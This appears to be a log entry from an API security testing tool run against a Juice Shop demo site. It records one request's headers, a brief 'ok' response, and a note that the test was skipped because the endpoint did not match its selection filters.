Original request : {"Origin":"https://juiceshop.akto.io","Cookie":"language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; continueCode=v7BmaPZbQ7NroLqvm1YzMVnwOBAVkTefndgpE5jkJlXey43R68K2D9xWNQgq","Accept":"*/*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36","Referer":"https://juiceshop.akto.io/","Connection":"close","Sec-Fetch-Site":"same-origin","Sec-Fetch-Dest":"empty","Host":"juiceshop.akto.io","Accept-Encoding":"gzip, deflate","Sec-Fetch-Mode":"cors","Content-type":"text/plain;charset=UTF-8","sec-ch-ua":"\"Not A(Brand\";v=\"24\", \"Chromium\";v=\"110\"","sec-ch-ua-mobile":"?0","sec-ch-ua-platform":"\"macOS\"","Accept-Language":"en-GB,en-US;q=0.9,en;q=0.8","Content-Length":"2"}
40
Original response: {"Connection":"close","Content-Length":"2","Date":"Thu, 09 Mar 2023 14:48:39 GMT","Content-Type":"text/html"}
ok
Attempted errors : 
Error 1: Request API failed to satisfy api_selection_filters block, skipping execution


 ------------------------------------